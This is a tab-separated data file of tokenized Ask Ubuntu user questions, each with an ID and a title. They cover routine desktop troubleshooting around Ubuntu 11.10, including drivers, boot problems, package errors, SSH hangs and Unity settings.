68230	google music does not play songs	i 've been using google music for a while in ubuntu 10.10 without any issues . i just updated to 11.10 thinking most of the bugs from the initial gnome3/unity changes would be ironed out . now when i play music in google music no sound is coming out . after the page loads i go into a playlist , click the play button and a spinner appears next the song and play icon i just click stays there , then i click the play button again and the icon next to the song changes to indicate the some is playing , but no sound is coming out and the song progress bar does n't move it just stays at 0 seconds of the song . any help would be appreciated .
68232	how do i install likewise 6 without an internet connection ?	hi , i 'm very new to linux , i 'm using ubuntu 11 alongside windows in my work and i cant download likewise directly from the software centre without joining the domain . my other option is to download it on my home pc and them make image of my computer but this will be too big to put on usb flash drive . how do i install the likewise 6 ( i have it downloaded ) manually , without internet connection ? thanks .
68234	is it possible to use the 'unity-greeter ' for lightdm on xubuntu 11.10 ?	i was wondering if there is a way to use the 'unity-greeter ' instead of 'lightdm-gtk-greeter ' for lightdm on xubuntu oneiric . i tried installing the unity-greeter package and changing the greeter-session entry in /etc/lightdm/lightdm.conf , but when i restart the system i get a blinking screen and the boot process get stuck .
68245	ubuntu hits a black screen after boot	i have used wubi.exe to install ubuntu 11.10 from windows7 . the os boots properly most of the time but fails sometimes and hits a blank screen . i could not check any messages on other terminals using `` ctrl+alt+f1 '' as i feel like everything is froze ... no keyboard input works . after searching for sometime , it seems to be a known issue while using ubuntu with a machine having discrete graphics . the machines do contain integrated as well as discrete graphics card ati radeon 6xxxx i installed the proprietary driver for ati using ubuntu software center but things gone worse . the os boots and shows up with a black screen all the time . using recovery mode , i uninstalled the fglrx driver and it healed . now i let the os to boot with open source radeon driver but the blank screen issue occurs at times and freezes . tried blacklisting radeon and fglrx in modprobe.d/blacklist.conf file . rebooting with this didnt solved the problem . again blank screen . another reboot , no problem seen , and after few reboots , it again shows up with the problem . only solution i had was to set nomodeset while booting in the grub entry option . but the screen resolution is not good . any help is much appreciated .
68246	can not read openpgp card as non-root ?	same openpgp card and reader setup were working fine on ubuntu 11.04 natty . after upgrading to ocelet with a clean install i ran into the basically the same issue this guy posted about here . to summarize card read operations such as gpg -- card-status now only work with the sudo command .
68250	i ca n't seem to change the font rendering setting ?	how do i change it from what seems to be no dithering and ultra-sharp fonts to a more smooth appearence , and from rgb to mono ?
68252	root data analysis framework in 11.10 ?	i use the root analysis data framework for work , and it is n't available in the repos anymore ( removed from 11.04 due problems compiling due to directory changes in debian , i think i read ) . anyone tried to compile this is in 11.10 , or know if it will be made available later ? searching for answers is made difficult by its ridiculous name .
68257	ca n't install/remove/upgrade any package	so i 've been trying to upgrade ubuntu 11.10 64-bit few days back and received an error : dpkg : ../../src/archives.c:978 : tarobject : assertion `r == stab.st_size ' failed . so i followed this ubuntu forums post and this one . removed ubuntu-docs from info folder and status file . now whenever i try to install/remove/upgrade any package i receive an error : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the ubuntu-docs package . this might mean you need to manually fix this package . when i try to install ubuntu-docs from command line , i get this output : blockquotereading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : ubuntu-docs 1 upgraded , 0 newly installed , 0 to remove and 33 not upgraded . 1 not fully installed or removed . need to get 1,408 kb of archives . after this operation , 22.5 mb of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ oneiric/main ubuntu-docs all 11.10.4 [ 1,408 kb ] fetched 1,408 kb in 5s ( 265 kb/s ) ( reading database ... dpkg : warning : files list file for package `ubuntu-docs ' missing , assuming package has no files currently installed . ( reading database ... 323646 files and directories currently installed . ) preparing to replace ubuntu-docs 11.10.4 ( using ... /ubuntu-docs_11.10.4_all.deb ) ... unpacking replacement ubuntu-docs ... dpkg : ../../src/archives.c:978 : tarobject : assertion `r == stab.st_size ' failed . e : sub-process /usr/bin/dpkg exited unexpectedly ... which looks about the same as when i started with problem , so i looked in info -- there is no package ubuntu-docs but there is entry in status so i deleted it and tried again , but as soon as i do sudo dpkg -- configure -a the entry for ubuntu-docs reappears . any thoughts ? edit ( not as a comment to save formatting ) : this thread says i need to run sudo apt-get update after removing corresponding lines from status . so i ran sudo apt-get clean followed by sudo apt-get update . but i got a message saying : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . after running sudo dpkg -- configure -a , status file contains following lines : package : ubuntu-docs status : install reinstreq half-installed priority : optional section : doc version : 11.10.4 not sure if it helps .
68259	ehci_hcd resets interfere with usb transfers	so i have this extremely annoying problem and would love some help . thanks in advance . first off i 'm using a vaio z series laptop , 2.4 ghz , 4 gb ddr3 ram . i am on ubuntu 11.04 64-bit at the moment . the problem started when i did a clean install of 11.10 . i encountered multiple bugs including the one i 'm going to describe below . i went back to 11.04 and some how i have the same bug in 11.04 aswell now . i did not have this bug before . basically , when i connect my android phone to the computer and try to transfer music to it via a usb cable in rhythmbox , the transfers are extremely slow and after awhile it crashes and i get errors . my phones sd card is unmounted and unable to mount again till i yank the battery out . dmesg gives me the following output . [ 14.103288 ] usbcore : registered new interface driver qcserial [ 46.080145 ] usb 2-1 : new high speed usb device using ehci_hcd and address 3 [ 46.795743 ] usbcore : registered new interface driver uas [ 46.830958 ] initializing usb mass storage driver ... [ 46.831135 ] scsi6 : usb-storage 2-1:1.0 [ 46.831758 ] usbcore : registered new interface driver usb-storage [ 46.831760 ] usb mass storage support registered . [ 68.119351 ] usb 2-1 : usb disconnect , address 3 [ 68.900055 ] usb 2-1 : new high speed usb device using ehci_hcd and address 4 [ 69.065239 ] scsi7 : usb-storage 2-1:1.0 [ 329.240062 ] usb 2-1 : reset high speed usb device using ehci_hcd and address 4 [ 339.570085 ] usb 2-1 : reset high speed usb device using ehci_hcd and address 4 [ 355.900067 ] usb 2-1 : reset high speed usb device using ehci_hcd and address 4 [ 356.240041 ] usb 2-1 : reset high speed usb device using ehci_hcd and address 4 [ 366.570066 ] usb 2-1 : reset high speed usb device using ehci_hcd and address 4 [ 401.750816 ] usb 2-1 : usb disconnect , address 4 i thought maybe there was something wrong with my sd card so i bought a new 16 gb class 4 card but the same problem occurs . if i use the microsd with an adapter in the card reader the transfer speeds start off at 20 mb and then slow down to 1 mb . i dont know what to do . i searched all over the ubuntu forums but didnt come up with any solutions . i can confirm that i didnt have this problem before . did an update break something ? is my echi driver broken due to an update ? is this a hardware problem ? if its a kernel issue how come it wasnt there before but only appeared after i went to 11.10 and then back to 11.04 . thanks for all your help guys . soh
68265	how do i replace the breadcumbs and replace with the full text path ?	how do i remove the breadcumbs and replace with the full text path in the nautilus address bar by default ?
68266	why do n't my icons change in unity ?	i recently upgraded to ubuntu 11.10 and it has been a headache ever since . i have gnome-tweak-tools installed , ccsm is configured to work well with unity , and i have tried each the three built-in unity themes . my problem is that when i change the theme , only the window border changes . the icons do n't change ( on the panel and otherwise ) , nautilus still looks ugly , scroll-bars do n't change , etc . everything looks very plain , boxy , and windows 98-like . i did n't have any of these problems with ubuntu 11.04 ( of course i was n't using unity then ) .
68269	how to enable experimental rounded corners ?	my one major disappointment with oneiric is that it no longer includes nice rounded corners as in some of the dev builds : andrea cimitan 's google+ post . although he argues that compiz is still too buggy to make it work , i still want to try it out . does anyone know what packages i need to install/compile to get this working ?
68273	why so many `` duplicated '' ( i386 + x86_64 ) packages installed ?	i did a fresh install of a 64bit laptop ( where previously i had ubuntu 10.04 64bit ) i now notice that everytime i install a package from the reppos , i get lots of duplicate libs both in 32bit and 64bit , why ? i only have the official ubuntu reppos and installed openshot video editor and flash and a few other things like compizconfig settings manager and gnome tweak tool ... i now magically have 122 duplicated libs in 2 different architectures , why ? dpkg -l|grep `` : i386 '' |wc -l if i inspect this list i find both 64bit and 32bit in my system ... this is really a waste of space and then which one is used by the apps ? 32 or 64 ? it is really confusing ...
68278	clicking on a mounted drive on the launcher does n't open it	my external drive is mounted as /media/usr2 and is visible in the `` dock '' . when i right-click it , `` open '' is one of the options but it never opens . why does `` open '' not work ?
68280	black screen during installation on a dell latitude e6510	i have download 32 and 64 bit version of ubuntu 11.10 ( latest ) and tried to install/live run on my dell latitude e6510 . but i just get black screen , even when i select `` try '' i can here login sound but not view . here is specifications of laptop : latitude e65100 intel core i5 4096mb ram nvidia nvs 3100m ( integrated ramdc )
68284	how to keep thunderbird and pidgin running on background ?	is there any way to keep messaging services ( im - pidgin , mail client - thunderbird ) running `` on background '' ? i want to have them waiting for incoming messages but they disturb me when switching between applications using alt-tab . anyway , i access those programs by clicking on the envelope indicatior in the toolbar so i do n't need to see them in the list of running apps . my desire is the behavior just like with banshee or empathy . i do n't want the solutions like alltray since the applications already have their `` tray '' in the envelope applet . edit : i have realized pigin behaves like this . i do n't know if it did before but now it 's okay . so just thunderbird now ...
68290	could not open address book due to desktopcouch error	i am using thunderbird with ubuntu since 2007. after the upgrade from 11.04 to 11.10 ubuntu one show me this alert : < '' could not open address book '' there was a problem opening the address book `` ubuntu one '' - the message returned was : can not open book : could not create desktopcouchsession object > . please what is the meaning of the message and , overall , what can i do ?
68292	how to auto-unlock keyring manager ?	how can i auto-unlock the keyring manager in oneiric ocelot ? i have found this description for intrepid , but ocelot looks different so i ca n't follow the instructions . i have set up my machine to automatically log in to my account . i am using unity . i do n't mind the lesser security of having the keyring automatically unlocked . ( this is a home desktop computer of a simple user , not a missile launch system . )
68296	desktop freezes when trying to switch to another user	i 'm using ubuntu 11.10 gnome classic with 2 accounts admin and guest , if i try to switch users ubuntu log me out then get me into the login screen where guest and admin accounts are . while being in admin or guest ( either way ) trying to log into the other account ubuntu freezes and cant login into second ( whether admin or guest ) account . any ideas what to do to fix the issue so i can change users as normal ? update : here is a bug report about the issue . https : //bugs.launchpad.net/unity-greeter/+bug/835310 http : //ubuntuforums.org/showthread.php ? t=1861715 & page=2 to solve it : sudo apt-get remove libpam-smbpass and reboot .
68298	how to rename a user safely ?	i 've misspelled user name when installing ubuntu and would like to rename if possible . how can i safely change my user name ?
68300	ssh crashes after login	unfortunately ssh hangs up after login . already uninstalled and installed it again . i can fix the issue temporary by erasing ~/.ssh and logoff and login on my system again . here is my ssh -v dump : openssh_5.8p1 debian-7ubuntu1 , openssl 1.0.0e 6 sep 2011 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to host [ ip ] port 22. debug1 : connection established . debug1 : identity file /home/ < user > /.ssh/id_rsa type -1 debug1 : identity file /home/ < user > /.ssh/id_rsa-cert type -1 debug1 : identity file /home/ < user > /.ssh/id_dsa type -1 debug1 : identity file /home/ < user > /.ssh/id_dsa-cert type -1 debug1 : identity file /home/ < user > /.ssh/id_ecdsa type -1 debug1 : identity file /home/ < user > /.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.5p1 debian-6 debug1 : match : openssh_5.5p1 debian-6 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.8p1 debian-7ubuntu1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host key : < key > debug1 : host 'host ' is known and matches the rsa host key . debug1 : found key in /home/ < user > /.ssh/known_hosts:1 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : trying private key : /home/ < user > /.ssh/id_rsa debug1 : trying private key : /home/ < user > /.ssh/id_dsa debug1 : trying private key : /home/ < user > /.ssh/id_ecdsa debug1 : next authentication method : password user @ host 's password : debug1 : authentication succeeded ( password ) . authenticated to host ( [ ip ] :22 ) . debug1 : channel 0 : new [ client-session ] debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug1 : sending environment . debug1 : sending env lc_messages = de_de.utf-8 debug1 : sending env lc_collate = de_de.utf-8 debug1 : sending env lang = de_de.utf-8 debug1 : sending env lc_ctype = de_de.utf-8 does anybody have a clue ? 'cause i am clueless ... thanks in advance edit : also i want to mention that the terminal seems to hangup completely because ctrl + c or ctrl + x do n't work . edit2 : i also tried ssh -v host ls and the dump looks exactly the same except there is debug1 : sending command : ls at the end .
68303	what is the `` ubuntu '' session on the login screen ?	based on the login menu options , i see “ubuntu 2d” as an option and just “ubuntu” ; can i safely assume that “ubuntu” is 3d ?
68306	how do i remove the proprietary ati drivers ?	i 've installed 11.10 and the proprietary ati drivers using `` additional drivers '' the performance of my system is absolutely awful and it should n't be . i tried to remove the proprietary drivers using the additional drivers tool and it appears to remove them . however after i reboot i cant get back into my desktop properly ( the panel and launcher go missing ) . this does n't seem to be an isolated problem in 11.xx . this guide covers how to restore the desktop ( panel and launcher ) , but the guide does n't fix my problem though . whenever i do sudo unity -- reset it runs through its normal processes until it hangs at setting update `` run_key '' and never gets past that . i must reinstall the proprietary drivers using jockey-text or jockey-gtk in order to get back to my proper desktop . interestingly enough the system performance seems improved while it is in its `` broken '' state ( missing panel and launcher ) . i think restoring the default drivers may solve my problems but i cant figure out how to do it .
68310	unable to connect my android phone to my laptop using as a hotspot	i am using a 3g dongle . and i want to use internet on my android phone . see following screenshot , i press the button but it just give the message that connection established and after that , it came into its original state . what network should i select in the combo ? how can i achieve this ?
68315	downgrading the kernel version	im on ubuntu 10.04. with kernel version 2.6.32-34 . i need to downgrade the kernel version to 2.6.32.25 . how do i do this ? uname -a . linux supermace 2.6.32-34-generic-pae # 77-ubuntu smp tue sep 13 21:16:18 utc 2011 i686 gnu/linux
68316	ca n't install pdf-pro under wine	i am trying to install a windows program pdf-pro . i have installed this on my ubuntu 10.10 system using wine with no problem . when i try to install using wine program loader , the install starts and then just stops . i am using ubuntu 11.10 64bit
68319	how can i switch from server kernel to desktop kernel ?	i want to change the kernel-type from server to desktop . i installed my system from a server cd , but then installed gnome and now i want to change from server kernel to desktop kernel . how can i do this securely ?
68320	how do i change the window titles ( as used by wmctrl )	i am using wmctrl to move applications after i have launched them such that i do not have to do this manually for , for example , several text editors and web browsers and pdf viewers and terminals . i am issuing the following wmctrl command to move applications around wmctrl -r < title > -e < x > , < y > ,0 , -1 , -1 where < x > and < y > are the horizontal and vertical target coordinates , and < title > is the name of the application as returned by wmctrl -l. if i launch two copies of google chrome via the below commands , google-chrome & google-chrome & then issue the command wmctrl -l the window names returned are 0x03c06fd9 0 main new tab - google chrome 0x03c0703d 0 main new tab - google chrome now if i try to move one of those to an arbitrary coordinate , lets say 100,100 , with the following command wmctrl -r `` google chrome '' -e 100,100,0 , -1 , -1 it will , if you have n't already guessed it , move this google chrome window i am currently typing in , as i opened it prior to the other two . is there some way to assign these window titles when launching from the command line , or to reset them later . i need to change the names to something like google chrome 1 google chrome 2 google chrome 3 note there are two ways around this that i am aware of , however , i do not like either of them , for they could lead to problems if the os launches a program in the background . instead of using the title , use the numerical window id via the -i command . use the string : active : to use the active window
68321	lvm volumes do n't appear in nautilus since upgrading to 11.10	up to ubuntu 11.04 all my lvm volumes used to show up in the sidebar of nautilus as devices available to be mounted , alongside software raid volumes . after upgrading to 11.10 last week , i can only see software raid volumes ( i can mount/umount them ) but i ca n't find a way to make nautilus show lvm volumes ( on both my main desktop systems ) . i guess this must be a change in gio/gvfs but i ca n't find any settings for this - anyone has experienced this issue upon upgrading to gnome 3.0/3.2 and has figured out how to make lvm volumes appear in nautilus ' sidebar ? i can mount the volumes manually ok from the command line . none of them is in /etc/fstab .
68322	stuck on boot screen forever after upgrade to 11.10	i 'm pretty new to ubuntu . i was just upgrading from 11.04 to 11.10 , and my computer restarted ( i 'm not sure if it finished or not ) . then it got stuck on the ubuntu loading screen . so , i restarted it and now it just does n't stop loading . does anyone know of any possible solution ?
68325	where is the information about custom launchers in unity panel ?	i have recently pinned my `` custom '' application to the unity launcher bar . i 'd like to tweak it a bit , add a description and maybe and icon for easier alt-tab recognition . however , i was not able to find where is the launcher bar information stored . i have followed some older guides and looked to ~/.local/share/applications but nothing correspoding to my launcher is there . how ( where ) can i find that file ( s ) describing my launchers ?
68327	why does truecrypt ask for administrator password ?	when i login on my ubuntu system a script will mount a truecrypt container . to decrypt the container i have of course to enter the decryption password . but truecrypt also asks for my `` administrator password '' . why does truecrypt ask for my administrator password and how can i disable this ? this is the script which runs on startup : # ! /bin/sh -e /usr/bin/truecrypt /media/windows/data.tc /media/data /usr/bin/dropbox start /media/windows is a ntfs partition . /media/data is writable by the user .
68330	how do i recover my username and password on a persistent liveusb ?	i booted ubuntu 11.04 from a persistent pendrive installation . it asked for the keyring password the 1st time , and i just cancelled the dialog window and went through . after the 3rd or 4th booting ( keyring window did not appear anymore ) , a window with `` automatic log in '' ( which does not work ) and `` other '' tab choices appear . `` other '' prompts me to give `` user '' name and `` password '' and the problem is that i never set up these . i have already tried to get to a root command window on recovery mode at booting as per some forum instructions . i could never get recovery mode ; the system said : no image on kernel or something like that . i reinstalled ubuntu and fell in the same trap again . need help . please accept my thanks in advance .
68331	how to install oracle 11g ?	question : i 'm trying to install oracle 11g on ubuntu 11.10 . i got pretty far , using these 3 tutorials : https : //forums.oracle.com/forums/thread.jspa ? messageid=9596361 http : //blog.craigpoma.com/2010/07/installing-oracle-11gr2-on-fedora-13.html http : //lesscode.blogspot.com/2010/04/install-oracle-11g-r2-on-ubuntu-104.html but now , i 'm stuck with this one : info : /u01/app/oracle/product/11.2.0/dbhome_1/network/lib//libnlsnr11.a ( nsglsn.o ) : in function nsglonsterm ' : nsglsn.c : ( .text+0xc29 ) : undefined reference toons_subscriber_close ' nsglsn.c : ( .text+0xc3b ) : undefined reference to ons_shutdown_nowait' /u01/app/oracle/product/11.2.0/dbhome_1/network/lib//libnlsnr11.a ( nsglsn.o ) : in functionnsglma ' : nsglsn.c : ( .text+0x1ffb ) : undefined reference to ons_subscriber_receive ' nsglsn.c : ( .text+0x251d ) : undefined reference toons_notification_body ' nsglsn.c : ( .text+0x2a4b ) : info : undefined reference to ons_subscriber_relinquish ' nsglsn.c : ( .text+0x2a62 ) : undefined reference toons_subscriber_receive' /u01/app/oracle/product/11.2.0/dbhome_1/network/lib//libnlsnr11.a ( nsglsn.o ) : in function nsglonsinit ' : nsglsn.c : ( .text+0x2d43c ) : undefined reference toons_init ' nsglsn.c : ( .text+0x2d457 ) : undefined reference to ons_subscriber_create_async ' nsglsn.c : ( .text+0x2d473 ) : undefined reference toons_subscriber_status ' nsglsn.c : ( .text+0x2dc94 ) : undefined reference to `ons_shutdown_nowait' i think i see the problem ( the double slash in /network/lib//libnlsnr11.a ) but i do n't know how to solve it ... the offending makefile seems to be this one : ( /u01/app/oracle/product/11.2.0/dbhome_1/network/lib/ins_net_server.mk ) # $ id : cus_net_server.mk 08-mar-2002.10:43:34 donlee exp $ # # cus_net_server.mk - `` make '' command file to reload tnslsnr , lsnrctl # # used to reload tnslsnr , lsnrctl , after changing network protocol adapter . # # note : oracle_home must be either : # . set in the user 's environment # . passed in on the command line # . defined in a modified version of this makefile # # modified ( mm/dd/yy ) # donlee 03/08/02 - can not use $ < # donlee 02/27/02 - define/use macro covers for install_targs # donlee 02/26/02 - use relevant linkline macros # donlee 02/08/01 - rm unneeded macro defs # donlee 02/08/01 - rm unnecessary def of echo # mkrohan 10/12/00 - switch from linkexsyslibs to linkldlibs # mkrohan 05/20/00 - bug # 1304913 # include $ ( oracle_home ) /network/lib/env_network.mk install_targs=clean $ ( install_net_server_targs ) tnslsnr : $ ( s0nsgl ) $ ( snsglp ) $ ( nsglpnp ) $ ( silent ) $ ( echo ) `` - linking $ ( tnslsnr ) '' $ ( rmf ) $ @ $ ( tnslsnr_linkline ) itnslsnr : tnslsnr - $ ( mv ) -f $ ( binhome ) tnslsnr $ ( binhome ) tnslsnr0 - $ ( mv ) tnslsnr $ ( binhome ) tnslsnr - $ ( chmod ) 751 $ ( binhome ) tnslsnr lsnrctl : $ ( s0nsglc ) $ ( silent ) $ ( echo ) `` - linking $ ( lsnrctl ) '' $ ( rmf ) $ @ $ ( lsnrctl_linkline ) ilsnrctl : lsnrctl - $ ( mv ) -f $ ( binhome ) lsnrctl $ ( binhome ) lsnrctl0 - $ ( mv ) lsnrctl $ ( binhome ) lsnrctl - $ ( chmod ) 751 $ ( binhome ) lsnrctl preinstall : - $ ( chmod ) 755 $ ( binhome ) install : preinstall $ ( install_targs ) clean : which includes this one : /u01/app/oracle/product/11.2.0/dbhome_1/network/lib/env_network.mk but this file is too large to post here ... see here for the download link : http : //www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
68336	unity configuration does not apply when i use ccsm	when i configure unity via compizconfig settings manager or dconf , the settings can be seen like they applied but unity does n't care
68343	why there is no password to root under recovery mode ?	i am trying to understand this situation ... today i got a problem with de sudoers file since i modified and got problem whit this modification . so the only way to solve the problem was to modify the file using root in recovery mode . and there is where the problem start ... . no password was asked at all ... so , just by choosing 2 options ( recovery mode in grub and root in recovery mode ) , i 've got access to all my system and all his files as a root . this is very dangerous ! anyone could easily erase important files or simply broke the entire system without any password/password/ ... . is there any official communicate by canonical about this ? it is simply an old forget feature or just something that no one want to change just because they do n't want to ?
68344	where are theme customizations in 11.10 ?	i upgraded , and now i need to tweak my fonts for the ambiance theme - and i ca n't find anyplace to do it - in fact , the whole preview dialog for themes is gone - i 'm not sure why they did that , but it 'd be nice of them to put it back .
68345	brightness tooltip seems broken , any idea how to solve ?	in ubuntu 11.10 this bar is stuck between max ( full brightness ) and this position : keyboard shortcut to brightness are working full spectrum though ... any idea how to fix this ?
68347	is it possible to burn a 64-bit ubuntu live cd on a 32-bit computer ?	my wife has been using windows vista on her computer , and it has finally borked bad enough that she is willing to try ubuntu . the system is pretty much unbootable as far as i can tell , and i need to download and burn an iso image of the 64-bit version of oneiric ocelot ( 11.10 ) for her . can i do this from my 32-bit machine ?
68354	is there any way to specify which workspace and/or window to launch a program into ?	i asked a related , but more specific , question here . i want to know if there is a way to specify where you want a program to launch . i basically want to write a shell script which is launched every time i log in , like so google-chrome www.gmail.com -workspace=1 -monitor=1 google-chrome www.facebook.com -workspace=1 -monitor=2 google-chrome www.youtube.com -workspace=1 -monitor=3 gedit a.txt b.txt c.txt -workspace=2 -monitor=1 gedit d.txt e.txt f.txt -workspace=2 -monitor=2 gedit g.txt h.txt i.txt -workspace=2 -monitor=3 mplayer terminator1.mkv -workspace=3 -monitor=1 mplayer terminator2.mkv -workspace=3 -monitor=2 mplayer terminator3.mkv -workspace=3 -monitor=3 there is a program called wmctrl but it fails in so many ways that i do n't even know where to begin . in principle it is simple , specify the window , and move it . but specifying windows is not easy , two browsers are both named the same `` google chrome '' . one can use their unique window ids , but getting this information is not trivial ( afaik , this is not returned upon execution ) . then there is an : active : option which is the most recently launched program , but there is no guarantee that the window is launched when control is returned to the command line . to make matters worse , one must specify global coordinates , as opposed to optional coordinates within a workspace/monitor . here is the approach i am currently taking . i have uploaded some scripts to github ( see here or here ) which use wmctrl to move windows around .
68359	how to set up gnome-shell as the default de ?	pretty all in the question . i can choose `` gnome '' at login , but i set `` automatic login '' and always come to unity ... and i do prefer gnome shell . thanks .
68363	emgd vs psb_gfx gma500 driver	can anyone tell me which would be the better choice for my acer aspire one with intel gma500 video card ? which would give me better graphic performance ?
68366	gnome-shell stopped working after updating 11.10	i did a fresh install of ubuntu 11.10 , then proceeded to install gnome-shell . worked wonderfully until i did a sudo apt-get upgrade ... now logging into either gnome or unity sessions , i am presented with login sounds and a blank nautilus desktop . no icons , no window manager , no panels , just my wallpaper . is there a way to diagnose the problem ? -- update -- @ jorge : i 'm able to use alt+ctrl+del to bring up the logout dialog ( no window manager ) but prnt scrn does not respond with any screenshot dialog . here is an output of my .xsession-errors
68367	do i need a better graphics card for 11.10 ?	i am not anything like a gamer so a modern integrated graphic card should be more than enough for me but after getting a new pc with sandy bridge cpu ( intel core i7 2600k ) i 've had very shaky display on ubuntu 10.10 : flickering screen and random red pixels whenever there are black color on the browser . my motherboard is asrock h67m . as per suggestion here , yesterday i upgraded my ubuntu to 11.10 . not seen flickering screen yet but the random red pixels still show up on browser . so i am wondering whether it is a likely solution to apparently existing ) linux graphic issues with sandy bridge processors if i get an ubuntu-friendly graphic card . and if so , what cards have shown good fidelity with ubuntu ? here is my ubuntu 11.10 's ispc result : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 82801 pci bridge ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation h67 express chipset family lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation 6 series/c200 series chipset family 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation 6 series/c200 series chipset family 2 port sata ide controller ( rev 05 ) 02:00.0 usb controller : etron technology , inc. ej168 usb 3.0 host controller ( rev 01 ) 03:00.0 pci bridge : asmedia technology inc. device 1080 ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) thanks
68371	missing dropbox icon overlays after upgrade from 11.04 to 11.10	the upgrade went smoothly , dropbox is working ( i.e . it is syncing files ) , but the icon overlays are n't appearing no matter if i use unity , unity 2d or gnome shell . is there any setting that can fix this ? is there a new version of the dropbox extension for oneiric ?
68372	how do i add pcie_aspm=force to my boot options ?	i just upgraded to 11.10 from 11.04 on my laptop ( i do n't have windows ) by downloading from the ubuntu website . the laptop battery is in bad condition , but i was using it with the 11.04 plugged to ac all the time , and everything was fine . after installing 11.10 , the laptop seems to not notice that it is connected to ac , so it shuts down a few minutes after starting . i read that i have to type pcie_aspm=force in the boot command , so i tried accessing it by pressing the `` f6 '' key while booting , and then the other f keys , but nothing happened . i also found that i can write that instruction in the terminal window , but i do n't know in which file or location . i would appreciate some help , but i am not a computer engineer , so please write the instructions in plain english .
68374	it does n't work properly with nas	i usually work with live versions of ubuntu . i have a nas which i use for saving files from computers . when i save files to nas everything works ok but when i try to recover files from nas to the computer everything goes wrong . using ubuntu 9.04 and 9.10 it works properly , but from 10.04 on it stops working and you ca n't take the files from the nas .
68376	frequent .service file errors occurring	i updated a fresh install of ubuntu 11.10 desktop 32 bit and i am running into frequent errors . at first i thought they were application specific but now they are occurring randomly . the line always reads : '' the name [ com/org.someapp ] was not provided by any .service files '' there are n't many sources or information on these errors that i can find . can somebody please point me in the right direction ?
68377	upgrade failed , can i reinstall over current installation ?	i was running the distribution upgrade on my system76 serval professional , and the upgrade failed while configuring samba . this installed some of the os , but even though i can log in ( graphically ) to the system , panel icons do not work , nor does not nautilus ; metacity is just gone . how would i reinstall from a live cd over top of the current installation so that all pre-installed applications are installed ? if i ca n't do this , should i just 7zip my home folder and reinstall applications manually ( that is , if the 7zip binary will even work ; running the command firefox results in an error- i 'm not sure what ; maybe my path is n't configured ? ) .
68379	slow and laggy animations	why are my animations laggy and slow on my laptop ? amd turion tl-56 and hd 3200 with 2 gig ram .
68385	what is the weby-icon-cache folder in my home folder ?	the title pretty much says it all . can i delete it ? what are these .ico files for ?
68387	how to recover the launcher ?	i recently upgraded to 11.10 ( what a mistake ) and was using compizconfig . just clicking around in compizconfig , my launcher disappeared . rebooting does n't help . unity -- reset ends with 'initializing session options ... done ' and if i try to kill it , the machine hangs . any advice ? update : using ubuntu 2d works around the problem .
68388	can not print with canon ip1200 printer	i was happy to find that finally there 's a driver for my canon ip1200 printer which as of 11.04 was not available . plugged my usb cable and printer is recognized properly . right click on the printer then to properties - > settings . then i click on the `` print test page '' button . page rendering progress is shown , printer 's light starts blinking . but nothing comes out ! printer works fine from windows . any ideas ? please help , this is what 's been keeping me from fully moving to linux !
68389	how do i select the system fonts in ubuntu 11.10 ?	before 11.10 one could change the system default fonts in the appearance settings changer , but now one can only change the wallpaper . is there some gconf key one can use ?
68394	downloads from chrome or any shortcut from places menu opens with evince	when i try to open a file that has been downloaded from chrome , or any folder in the menu bar `` places '' , evince opens with an error . the error does not occur when i open a file with a particular program from the command line ( ie : gnumeric myfile.xls ) or if i open and navigate from places > computer , although it does occur with places > home folder , places > desktop , etc . for example , this is the result of clicking on places > desktop : i have tried the following : checking the settings for a given filetype to see if preferred application is 'evince ' , but it is not . i have followed this guide . checking the settings on chrome , but i can not find anything related to it . removing evince : received 'failed to execute default file manager ' ...
